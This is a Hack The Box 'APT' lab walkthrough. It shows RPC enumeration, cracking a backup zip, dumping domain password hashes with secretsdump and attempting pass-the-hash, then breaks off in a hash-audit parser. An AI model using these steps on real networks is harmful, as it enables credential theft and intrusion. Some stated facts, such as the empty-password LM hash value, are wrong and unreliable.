Learning Internal Network Penetration Starting from the APT Box

Prerequisites

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.213
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc

Only two ports are open.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -sT -sV -sC -O -p80,135 10.10.10.213
[sudo] password for i3eg1nner:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-01 07:49 EDT
Nmap scan report for 10.10.10.213
Host is up (0.077s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

A Windows host: port 80 exposes Microsoft IIS httpd 10.0 and port 135 is the msrpc service.

Web Penetration

A quick look at port 80 revealed this comment in the page:

<!-- Mirrored from 10.13.38.16/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:12:54 GMT -->

I searched for it but found no suitable way to exploit it. I inspected the images on the site with exiftool and the file command, and found no hints. On the form page, submitting some data produced a message that 10.13.38.16 could not be reached, which is not the IP we are targeting.

Directory brute-forcing also turned up nothing of value.

MSRPC Penetration

So the only thing left is port 135. First we need to fill in some background on MSRPC. The blog post AD Recon – MSRPC (135/539) - Juggernaut-sec walks through MSRPC penetration in great detail; if strict rigour is not required, following that post's approach directly makes this box much easier.

MSRPC is an interprocess communication (IPC) mechanism that allows client/server software communication. That process can be on the same computer, on the local network (LAN), or across the Internet. Its purpose is to provide a common interface between applications. Within Windows environments, many server applications are exposed via RPC.
MSRPC (Microsoft Remote Procedure Call) Service Enumeration | 0xffsec Handbook

MSRPC uses UDP port 135 and TCP ports 139 / 445. Two further concepts are involved:

  • RPC Locator Service: provides location services for remote procedure calls. Through the RPC Locator Service a client can query computers and services on the network to determine their location and availability.
  • RPC Endpoints: each RPC endpoint identifies a service or program on the network. When a client application needs to call a service on a remote server, it looks up the RPC endpoint on the target server through the RPC Locator Service. Once a matching endpoint is found, the client can use it to make remote procedure calls to the target server. Each returned IFID value represents one RPC service.

We can use tools to interact with it and obtain the RPC endpoints. Let's first try connecting with rpcclient:

┌──(kali㉿kali)-[~]
└─$ sudo rpcclient -I 10.10.10.213 -P 135
Failed to set machine account: NT_STATUS_CANT_ACCESS_DOMAIN_INFO

This should be an access-permission problem, so we have to use other tools.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -p135 --script=msrpc-enum 10.10.10.213
[sudo] password for i3eg1nner:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-01 08:11 EDT
Nmap scan report for 10.10.10.213
Host is up (0.081s latency).

PORT STATE SERVICE
135/tcp open msrpc

Nmap done: 1 IP address (1 host up) scanned in 2.94 seconds

The nmap built-in script found nothing. Next comes a toolkit.

impacket is a Python implementation of a series of network protocols, covering basic protocols such as IP, TCP and ICMP and, more importantly, a large number of Windows communication protocols. It lets you interact at the protocol level.

The first one we use is rpcdump.py, which on Kali can be run as impacket-rpcdump:

// the default port is 135
impacket-rpcdump 10.10.10.213

We obtained some UUID-related information (and DCOM components/methods), but we do not know how to use it, so we need another tool, rpcmap:

┌──(kali㉿kali)-[~]
└─$ impacket-rpcmap ncacn_ip_tcp:10.10.10.213[135]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1

Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0

Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2

Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0

Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0

This requires some understanding of DCOM.

COM (Component Object Model) is Microsoft's binary interface standard for software components, made up of a set of construction specifications and a component object library. A COM component object describes itself through interfaces, and every service the component provides is exposed through its interfaces. In Windows every COM object is identified by a unique 128-bit binary identifier, the GUID. When a GUID identifies a COM object it is called a CLSID (class identifier); when it identifies an interface it is called an IID (interface identifier). Some CLSIDs also have a ProgID to make them easier to remember.
DCOM (Distributed Component Object Model) is an extension of COM that uses RPC to extend COM's functionality beyond the local computer, so software hosting a COM server on a remote system (usually in a DLL or EXE) can expose its methods to clients via RPC. The interfaces exposed by some DCOM components may contain unsafe methods.
Summarised from 《内网渗透体系建设》

Besides the UUIDs we also want to obtain the opnums (operation numbers), which can be understood as the codes of a DCOM interface's methods.

// Run with only the target and no extra options, impacket-rpcmap tries a set of common UUIDs and opnums against the RPC interface and records each interface's response and supported operations.

-brute-uuids: Bruteforce UUIDs even if MGMT interface is available

-brute-opnums: Bruteforce opnums for found UUIDs

Let's try running the tool with those two options:

┌──(kali㉿kali)-[~]
└─$ impacket-rpcmap ncacn_ip_tcp:10.10.10.213[135] -brute-uuids -brute-opnums
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0
Opnums 0-64: rpc_s_access_denied

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2
Opnums 0-64: rpc_s_access_denied

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0
Opnums 0-64: rpc_s_access_denied

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Opnum 0: rpc_x_bad_stub_data
Opnum 1: rpc_x_bad_stub_data
Opnum 2: rpc_x_bad_stub_data
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnum 5: success
Opnums 6-64: nca_s_op_rng_error (opnum not found)

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Opnum 0: success
Opnum 1: rpc_x_bad_stub_data
Opnum 2: success
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnums 5-64: nca_s_op_rng_error (opnum not found)

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0
Opnum 0: rpc_fault_cant_perform
Opnum 1: rpc_fault_cant_perform
Opnum 2: rpc_x_bad_stub_data
Opnum 3: rpc_x_bad_stub_data
Opnum 4: rpc_x_bad_stub_data
Opnum 5: rpc_fault_cant_perform
Opnum 6: rpc_fault_cant_perform
Opnum 7: rpc_x_bad_stub_data
Opnum 8: rpc_x_bad_stub_data
Opnums 9-64: nca_s_op_rng_error (opnum not found)

Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0
Opnums 0-64: rpc_s_access_denied

[*] Tested 354 UUID(s)

Two UUIDs have success results. First, a Google search for 99FCFEC4-5260-101B-BBCB-00AA0021347A: the first result is the official Microsoft documentation, where the specific service name is found: [MS-DCOM]: Standards Assignments | Microsoft Learn

Opnums 3 and 5 returned success; clicking the link in the document took me to

The method name turns out to be ServerAlive. Searching for the keywords IObjectExporter ServerAlive, a Stack Overflow answer gave a link: win32api-practice/oxid-nic-resolver at master · EddieIvan01/win32api-practice (github.com)

That link led on to the next GitHub link.

Judging from the description, this may be an address-resolution service called via RPC. Searching for the keywords OXID rpc, the second result, The OXID Resolver [Part 1] - Remote enumeration of network interfaces without any authentication - Airbus Defence and Space Cyber, contains a script that uses it.

It is written in Python 2 syntax, but the change is simple: just add the parentheses missing after print.

#!/usr/bin/python

import sys, getopt

from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter

def main(argv):

    try:
        opts, args = getopt.getopt(argv, "ht:", ["target="])
    except getopt.GetoptError:
        print('IOXIDResolver.py -t <target>')
        sys.exit(2)

    target_ip = "192.168.1.1"

    for opt, arg in opts:
        if opt == '-h':
            print('IOXIDResolver.py -t <target>')
            sys.exit()
        elif opt in ("-t", "--target"):
            target_ip = arg

    # No authentication: IObjectExporter::ServerAlive2 answers unauthenticated callers
    authLevel = RPC_C_AUTHN_LEVEL_NONE

    # Bind to the endpoint mapper on TCP 135 of the target
    stringBinding = r'ncacn_ip_tcp:%s' % target_ip
    rpctransport = transport.DCERPCTransportFactory(stringBinding)

    portmap = rpctransport.get_dce_rpc()
    portmap.set_auth_level(authLevel)
    portmap.connect()

    objExporter = IObjectExporter(portmap)
    bindings = objExporter.ServerAlive2()

    print("[*] Retrieving network interface of " + target_ip)

    # Each returned binding carries one network address (hostname, IPv4 or IPv6)
    #NetworkAddr = bindings[0]['aNetworkAddr']
    for binding in bindings:
        NetworkAddr = binding['aNetworkAddr']
        print("Address: " + NetworkAddr)

if __name__ == "__main__":
    main(sys.argv[1:])

Let's try running it:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ python IOXIDResolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::15c
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::e16a:d825:adec:9529

IPv6 Scan

Success: we got two IPv6 addresses. dead:beef is just the most widely used placeholder prefix and has no special meaning.

Amazingly, this also worked on the Windows 10 host – even though we were denied access with rpcmap.py
The first recommended MSRPC blog post makes an interesting point: even when we cannot use rpcmap to get endpoint information, if IObjectExporter (IOXIDResolver) exists on the target, the script above can still be used to obtain more IP information.

Now that we have a new IP target, let's run an nmap scan against the IPv6 address:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-31 05:50 EDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.075s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49675/tcp open unknown
49698/tcp open unknown

I also scanned the other IPv6 address; the results were identical, so from here on we only work against the first one.

A quick analysis of the services on each port:

  • 53 is the DNS service port.
  • 80 is the web port.
  • 88 is normally used by the Kerberos authentication protocol (the KDC listens here).
  • 389 is the standard LDAP port, used for non-secure (unencrypted) connections. 636 is the secure version of LDAP, normally used for encrypted LDAP communication.
  • 464 is used by the Kerberos Password Change service, also called the Kerberos Change Password Protocol.
  • 593 is the port for RPC over HTTP (RPC exposed as a web service).
  • 3269 is the default port for secure SSL/TLS connections to the Global Catalog, the secure version of 3268 (the Global Catalog is a special directory in a forest that holds a partial replica of every object in the whole forest, whereas a standard LDAP directory may only contain the information of one domain or organisation).
  • 5985, 4986 and 47001 are all Windows Remote Management, known as winrm or wsman. If Windows Remote Management is installed but not configured, 47001 is open by default; once configured, 5985 is open, and with SSL on top, 4986 is open.
  • 9389 is normally used by Active Directory Web Services (ADWS), a web-service-based technology that provides interaction with Active Directory through standard web service interfaces.
  • The remaining high ports are dynamic ports.

Scan the services on these ports:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -6 -sT -sV -sC -O -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49698 dead:beef::b885:d62a:d679:573f
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-31 06:02 EDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.075s latency).

PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-31 02:02:38Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-31T02:05:17+00:00; -7h59m52s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
445/tcp open @ Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2023-10-31T02:05:16+00:00; -7h59m52s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-31T02:05:17+00:00; -7h59m52s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-31T02:05:16+00:00; -7h59m52s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2023-10-31T02:05:02+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2023-10-31T02:05:05
|_ start_date: 2023-10-31T01:45:51
|_clock-skew: mean: -7h59m51s, deviation: 0s, median: -7h59m52s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.81 seconds

Let's extract the key information:

Port 389 exposes apt.htb.local
Port 445 exposes Windows Server 2016 Standard
Computer name apt, domain name htb.local

This confirms beyond doubt that this is a domain controller. We also need to map htb.local to the IPv6 address.

Browsing to it shows the same page as the earlier IPv4 address, which recalls the comment in the page source saying the site was generated by a mirroring tool.

SMB Penetration

We go for the low-hanging fruit first: SMB shares are enabled here, so let's check which shares exist:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo smbclient -L //htb.local
[sudo] password for i3eg1nner:
Password for [WORKGROUP\root]:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
htb.local is an IPv6 address -- no workgroup available

Let's try the backup share first:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo smbclient //htb.local/backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 03:30:52 2020
.. D 0 Thu Sep 24 03:30:52 2020
backup.zip A 10650961 Thu Sep 24 03:30:32 2020

5114623 blocks of size 4096. 2632388 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (2632.6 KiloBytes/sec) (average 2632.6 KiloBytes/sec)
smb: \> exit

The remaining shares can be checked as well while we are here, though the chance of finding anything in them is small.

Look at the backup.zip file:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ file backup.zip
backup.zip: Zip archive data, at least v2.0 to extract, compression method=store
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
0 2020-09-23 19:40 Active Directory/
50331648 2020-09-23 19:38 Active Directory/ntds.dit
16384 2020-09-23 19:38 Active Directory/ntds.jfm
0 2020-09-23 19:40 registry/
262144 2020-09-23 19:22 registry/SECURITY
12582912 2020-09-23 19:22 registry/SYSTEM
--------- -------
63193088 6 files

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
skipping: Active Directory/ntds.dit incorrect password
skipping: Active Directory/ntds.jfm incorrect password
creating: registry/
skipping: registry/SECURITY incorrect password
skipping: registry/SYSTEM incorrect password

Listing the archive shows an Active Directory directory and a registry directory:

  • ntds.dit is the domain controller's counterpart of the SAM
  • ntds.jfm is the file for ntds.dit writes that were lost

Zip Cracking

The backup may not be very current. Extraction requires a password, so we crack it with john.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ zip2john backup.zip
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
backup.zip:$pkzip$4*1*1*0*8*24*9beb*0f135e8d5f02f852643d295a889cbbda196562ad42425146224a8804421ca88f999017ed*1*0*8*24*65d9*2a1c4c81fb6009425c2d904699497b75d843f69f8e623e3edb81596de9e732057d17fae8*1*0*8*24*acd0*0949e46299de5eb626c75d63d010773c62b27497d104ef3e2719e225fbde9d53791e11a5*2*0*156*4000*2a393785*81733d*37*8*156*2a39*...*$/pkzip$::backup.zip:Active Directory/ntds.jfm, registry/SECURITY, registry/SYSTEM, Active Directory/ntds.dit:backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

First use zip2john to get the hash, then crack it with john:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ vim ziphash

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo john ziphash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2023-10-31 07:09) 100.0g/s 819200p/s 819200c/s 819200C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

secretsdump

Next we use the secretsdump tool to extract the information it holds; knowing to reach for this tool in this situation is a matter of experience.

A recommended site here is WADComs, which collects many common tools and commands for domain environments. There is also the article Impacket脚本利用指南(上) - 先知社区 (aliyun.com)

secretsdump.py provides various techniques to dump passwords remotely without running any program. For the SAM, LSA and cached credentials, it tries to read from the target's registry, saves the hives in the %SYSTEMROOT%\Temp directory, and then reads the hives back. For the DIT file it uses the DL_DRSGetNCChanges function to dump the target's NTLM hashes, cleartext passwords and Kerberos keys. It can also run vssadmin via smbexec or wmiexec to obtain NTDS.dit and decrypt it. If a service it needs is not running, for example Remote Registry, the script starts it, and restores the service to its previous state when it finishes.

And of course HackTricks is always the GOAT: Stealing Windows Credentials - HackTricks

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ impacket-secretsdump -ntds Active\ Directory/ntds.dit -system registry/SYSTEM LOCAL > user_hash_raw

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ cat user_hash_raw | wc -l
8005

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ head -n 20 user_hash_raw
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
jeb.sloan:3200:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30:::
ranson.mejia:3201:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab:::
unice.daugherty:3202:aad3b435b51404eeaad3b435b51404ee:531c98e26cfa3caee2174af495031187:::
kazuo.deleon:3203:aad3b435b51404eeaad3b435b51404ee:fde29e6cb61b4f7fda1ad5cd2759329d:::
dacy.frederick:3204:aad3b435b51404eeaad3b435b51404ee:51d368765462e9c5aebc456946d8dc86:::
emeline.boone:3205:aad3b435b51404eeaad3b435b51404ee:273c48fb014f8e5bf9e2918e3bf7bfbd:::
baris.martin:3206:aad3b435b51404eeaad3b435b51404ee:98590500f99a1bee7559e97ad342d995:::
mea.cash:3207:aad3b435b51404eeaad3b435b51404ee:10cf01167854082e180cf549f63c0285:::

The format here is username:user SID value (RID):LM hash:NTLM hash::: but the dump contains more than just this format. A good blog post introducing NTLM: Windows下的密码hash——NTLM hash和Net-NTLM hash介绍 (3gstudent.github.io)

There is a lot of content, more than eight thousand lines in total. Let's look at the first twenty. The very first entry is the Administrator hash, but given the difficulty of this box the chance that a pass-the-hash with it directly yields administrator access is low; it is still worth a try. A detailed introduction to the evil-winrm tool used here is in A Detailed Guide on Evil-Winrm - Hacking Articles. Two things to add: evil-winrm's default port is 5985, and evil-winrm can load local PowerShell scripts and executables; the details are in that post.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ evil-winrm -i htb.local -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

In addition, the information secretsdump exports contains different types of data.

What we should care about most here are the Windows NTLM hashes. Note that in the username:user SID value:LM hash:NTLM hash::: format the LM hash is normally d167c3238864b12f5f82feae86a7f798, meaning the LM hash of an empty password.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ grep ":::" user_hash_raw | wc -l
2000
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ grep ":::" user_hash_raw | awk -F ':' '{printf "%s:%s\n",$3,$4}' > hash_list
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ grep ":::" user_hash_raw | awk -F ':' '{print $1}' > user_list
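As an added example (not code from the original post or from impacket), here is a small Python parser for the secretsdump NTDS line format just described. It produces the same user_list / hash_list split as the grep and awk commands above, but validates all four fields, and then audits the entries the way a defender reviewing such a backup would: accounts with an empty password, accounts still storing an LM hash, and NT hashes shared by several accounts. The sample dump and all non-empty hash values in it are constructed.

```python
import re
from collections import Counter

# Well-known constants: the LM field when no LM hash is stored, and the NT hash
# of an empty password (both visible in the dump above for Guest/DefaultAccount).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One NTDS credential line: [domain\]user:rid:lmhash:nthash:::
HASH_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_secretsdump(text):
    """Return one dict per NTLM credential line in secretsdump output.

    Status lines ("[*] ..."), blank lines and other secret types (Kerberos keys,
    cleartext entries) are skipped, like grep ":::" in the write-up, but every
    one of the four fields is validated instead of just looking for ":::".
    """
    entries = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["rid"] = int(e["rid"])
        e["machine"] = e["user"].endswith("$")          # computer accounts end in $
        e["empty_password"] = e["nt"] == EMPTY_NT_HASH
        e["lm_stored"] = e["lm"] != EMPTY_LM_HASH
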